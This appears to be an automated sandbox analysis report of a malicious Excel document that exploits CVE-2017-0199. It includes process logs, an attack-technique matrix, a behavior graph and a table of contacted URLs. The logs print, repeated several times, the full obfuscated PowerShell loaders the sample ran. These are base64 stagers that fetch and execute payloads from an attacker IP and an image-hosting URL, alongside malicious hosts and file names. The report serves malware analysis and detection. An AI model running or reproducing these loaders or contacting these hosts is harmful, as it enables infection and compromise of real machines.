        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $verilus = 'jgfwb3n0b2xpy25lc3mgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskdmlicm9tzxrlcnmgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrzyw5nyxblbnvtid0gjhzpynjvbwv0zxjzlkrvd25sb2fkrgf0ysgkyxbvc3rvbgljbmvzcyk7jghvcmlzbwfzy29wzsa9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrzyw5nyxblbnvtktsksmfuaw5lid0gjzw8qkftrty0x1nuqvjupj4noyr0cmlicm9tc2fsb2wgpsanpdxcqvnfnjrfru5epj4noyrbcmficya9icrob3jpc21hc2nvcguusw5kzxhpzigksmfuaw5lktskcgx1cmlzcglyywwgpsakag9yaxntyxnjb3bllkluzgv4t2yojhryawjyb21zywxvbck7jefyywjzic1nzsawic1hbmqgjhbsdxjpc3bpcmfsic1ndcakqxjhynm7jefyywjzics9icrkyw5pbmuutgvuz3rooyrkzwnlcm5tzw50id0gjhbsdxjpc3bpcmfsic0gjefyywjzoyrhzmlyzsa9icrob3jpc21hc2nvcguuu3vic3ryaw5nkcrbcmficywgjgrly2vybm1lbnqpoyr1bmryzxnzzwqgpsatam9pbiaojgfmaxjlllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcrhzmlyzs5mzw5ndggpxtskr2fzdg9uid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkdw5kcmvzc2vkktsky3v0axrlcmvicmegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrhyxn0b24poyrhbgxhbnrvawrlysa9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrhbgxhbnrvawrlys5jbnzva2uojg51bgwsieaojzavdnlpzeivci9lzs5ldhnhcc8vonnwdhrojywgjyriaw9ncmfwagvlcycsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywgj0nhc1bvbccsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnmscsjyriaw9ncmfwagvlcycpkts=';$spinispicule = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($verilus));invoke-expression $spinispicule
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $verilus = 'jgfwb3n0b2xpy25lc3mgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskdmlicm9tzxrlcnmgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrzyw5nyxblbnvtid0gjhzpynjvbwv0zxjzlkrvd25sb2fkrgf0ysgkyxbvc3rvbgljbmvzcyk7jghvcmlzbwfzy29wzsa9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrzyw5nyxblbnvtktsksmfuaw5lid0gjzw8qkftrty0x1nuqvjupj4noyr0cmlicm9tc2fsb2wgpsanpdxcqvnfnjrfru5epj4noyrbcmficya9icrob3jpc21hc2nvcguusw5kzxhpzigksmfuaw5lktskcgx1cmlzcglyywwgpsakag9yaxntyxnjb3bllkluzgv4t2yojhryawjyb21zywxvbck7jefyywjzic1nzsawic1hbmqgjhbsdxjpc3bpcmfsic1ndcakqxjhynm7jefyywjzics9icrkyw5pbmuutgvuz3rooyrkzwnlcm5tzw50id0gjhbsdxjpc3bpcmfsic0gjefyywjzoyrhzmlyzsa9icrob3jpc21hc2nvcguuu3vic3ryaw5nkcrbcmficywgjgrly2vybm1lbnqpoyr1bmryzxnzzwqgpsatam9pbiaojgfmaxjlllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcrhzmlyzs5mzw5ndggpxtskr2fzdg9uid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkdw5kcmvzc2vkktsky3v0axrlcmvicmegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrhyxn0b24poyrhbgxhbnrvawrlysa9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrhbgxhbnrvawrlys5jbnzva2uojg51bgwsieaojzavdnlpzeivci9lzs5ldhnhcc8vonnwdhrojywgjyriaw9ncmfwagvlcycsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywgj0nhc1bvbccsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnmscsjyriaw9ncmfwagvlcycpkts=';$spinispicule = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($verilus));invoke-expression $spinispiculeJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jhheicagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxrzcgugicagicagicagicagicagicagicagicagicagicagicaglw1ltujfcmrfzkluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vbi5kbgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagierrsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicaguurstwx0wmrdsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrg1osudkc014zkmsdwludcagicagicagicagicagicagicagicagicagicagicagicbsleludfb0ciagicagicagicagicagicagicagicagicagicagicagicbddmtnaeopoycgicagicagicagicagicagicagicagicagicagicagicaglu5btwugicagicagicagicagicagicagicagicagicagicagicagilnyz3bdamuiicagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq0ugicagicagicagicagicagicagicagicagicagicagicagzucgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicakeeq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjkvotavdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwviywnrd2l0ag5ldy50suyilcikrw52okfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtiiwwldapo3n0yvj0lxnmrwvwkdmpo0lodk9rrs1fefbyzvntaw9uicagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcdmvyew5py2vizwf1dglmdwxwawn0dwvmb3jlbnrpcmvsawzla2lkc2dpdmvubwuudmjtig=='+[char]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $verilus = 'jgfwb3n0b2xpy25lc3mgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcgjzskdmlicm9tzxrlcnmgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrzyw5nyxblbnvtid0gjhzpynjvbwv0zxjzlkrvd25sb2fkrgf0ysgkyxbvc3rvbgljbmvzcyk7jghvcmlzbwfzy29wzsa9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrzyw5nyxblbnvtktsksmfuaw5lid0gjzw8qkftrty0x1nuqvjupj4noyr0cmlicm9tc2fsb2wgpsanpdxcqvnfnjrfru5epj4noyrbcmficya9icrob3jpc21hc2nvcguusw5kzxhpzigksmfuaw5lktskcgx1cmlzcglyywwgpsakag9yaxntyxnjb3bllkluzgv4t2yojhryawjyb21zywxvbck7jefyywjzic1nzsawic1hbmqgjhbsdxjpc3bpcmfsic1ndcakqxjhynm7jefyywjzics9icrkyw5pbmuutgvuz3rooyrkzwnlcm5tzw50id0gjhbsdxjpc3bpcmfsic0gjefyywjzoyrhzmlyzsa9icrob3jpc21hc2nvcguuu3vic3ryaw5nkcrbcmficywgjgrly2vybm1lbnqpoyr1bmryzxnzzwqgpsatam9pbiaojgfmaxjlllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcrhzmlyzs5mzw5ndggpxtskr2fzdg9uid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkdw5kcmvzc2vkktsky3v0axrlcmvicmegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrhyxn0b24poyrhbgxhbnrvawrlysa9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrhbgxhbnrvawrlys5jbnzva2uojg51bgwsieaojzavdnlpzeivci9lzs5ldhnhcc8vonnwdhrojywgjyriaw9ncmfwagvlcycsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywgj0nhc1bvbccsicckymlvz3jhcghlzxmnlcanjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnjgjpb2dyyxbozwvzjywnmscsjyriaw9ncmfwagvlcycpkts=';$spinispicule = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($verilus));invoke-expression $spinispicule
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information121
        Scripting
        Valid Accounts121
        Command and Scripting Interpreter
        121
        Scripting
        11
        Process Injection
        1
        Masquerading
        OS Credential Dumping1
        Process Discovery
        Remote Services1
        Email Collection
        1
        Web Service
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts23
        Exploitation for Client Execution
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        31
        Virtualization/Sandbox Evasion
        LSASS Memory31
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Archive Collected Data
        11
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts3
        PowerShell
        Logon Script (Windows)Logon Script (Windows)11
        Process Injection
        Security Account Manager1
        Application Window Discovery
        SMB/Windows Admin Shares1
        Clipboard Data
        3
        Ingress Tool Transfer
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
        Obfuscated Files or Information
        NTDS1
        Remote System Discovery
        Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Install Root Certificate
        LSA Secrets1
        File and Directory Discovery
        SSHKeylogging13
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain Credentials14
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1574071 Sample: Euro confirmation Sp.xls Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 98 Suricata IDS alerts for network traffic 2->98 100 Malicious sample detected (through community Yara rule) 2->100 102 Multi AV Scanner detection for submitted file 2->102 104 15 other signatures 2->104 10 EXCEL.EXE 35 39 2->10         started        process3 dnsIp4 63 23.95.235.29, 49162, 49164, 49165 AS-COLOCROSSINGUS United States 10->63 65 jktc.pro 104.21.34.183, 443, 49161, 49163 CLOUDFLARENETUS United States 10->65 59 C:\Users\user\...\~DF634BD35CC9B94982.TMP, Composite 10->59 dropped 61 greatattitudewithn...lethingsgood[1].hta, HTML 10->61 dropped 116 Microsoft Office drops suspicious files 10->116 15 mshta.exe 10 10->15         started        19 mshta.exe 10 10->19         started        file5 signatures6 process7 dnsIp8 80 jktc.pro 15->80 86 Suspicious command line found 15->86 88 PowerShell case anomaly found 15->88 21 cmd.exe 15->21         started        82 172.67.163.184, 443, 49169, 49170 CLOUDFLARENETUS United States 19->82 84 jktc.pro 19->84 24 cmd.exe 19->24         started        signatures9 process10 signatures11 108 Suspicious powershell command line found 21->108 110 Wscript starts Powershell (via cmd or directly) 21->110 112 PowerShell case anomaly found 21->112 26 powershell.exe 23 21->26         started        30 powershell.exe 24->30         started        process12 file13 55 verynicebeautifulp...lifekidsgivenme.vbS, Unicode 26->55 dropped 57 C:\Users\user\AppData\...\vlwyfswc.cmdline, Unicode 26->57 dropped 114 Installs new ROOT certificates 26->114 32 wscript.exe 1 26->32         started        35 csc.exe 2 26->35         started        38 wscript.exe 30->38         started        40 csc.exe 2 30->40         started        signatures14 process15 file16 90 Suspicious powershell command line found 32->90 92 Wscript starts Powershell (via cmd or directly) 32->92 94 Windows Scripting host queries suspicious COM object (likely to drop second stage) 32->94 96 Suspicious execution chain found 32->96 42 powershell.exe 12 4 32->42         started        51 C:\Users\user\AppData\Local\...\vlwyfswc.dll, PE32 35->51 dropped 45 cvtres.exe 35->45         started        47 powershell.exe 38->47         started        53 C:\Users\user\AppData\Local\...\5djzgayy.dll, PE32 40->53 dropped 49 cvtres.exe 40->49         started        signatures17 process18 dnsIp19 67 paste.ee 42->67 70 cloudinary.map.fastly.net 151.101.1.137, 443, 49167 FASTLYUS United States 42->70 72 res.cloudinary.com 42->72 74 paste.ee 47->74 76 151.101.65.137, 443, 49172 FASTLYUS United States 47->76 78 res.cloudinary.com 47->78 signatures20 106 Connects to a pastebin service (likely for C&C) 74->106

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        Euro confirmation Sp.xls24%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
        Euro confirmation Sp.xls100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\~DF634BD35CC9B94982.TMP100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta...s0%Avira URL Cloudsafe
        https://jktc.pro/94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=gr0%Avira URL Cloudsafe
        http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htahttp:/0%Avira URL Cloudsafe
        https://jktc.pro/:0%Avira URL Cloudsafe
        https://jktc.pro/94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea0%Avira URL Cloudsafe
        http://crl.usertru0%Avira URL Cloudsafe
        http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta...un0%Avira URL Cloudsafe
        http://23.95.235.29/o0%Avira URL Cloudsafe
        http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta...0%Avira URL Cloudsafe
        https://jktc.pro/50%Avira URL Cloudsafe
        http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFm.dll-0%Avira URL Cloudsafe
        http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htant=gre0%Avira URL Cloudsafe
        http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF0%Avira URL Cloudsafe
        https://jktc.pro/0%Avira URL Cloudsafe
        http://23.95.235.29/90/veryniceb0%Avira URL Cloudsafe
        http://23.95.235.29/0%Avira URL Cloudsafe
        http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFp0%Avira URL Cloudsafe
        http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFC:0%Avira URL Cloudsafe
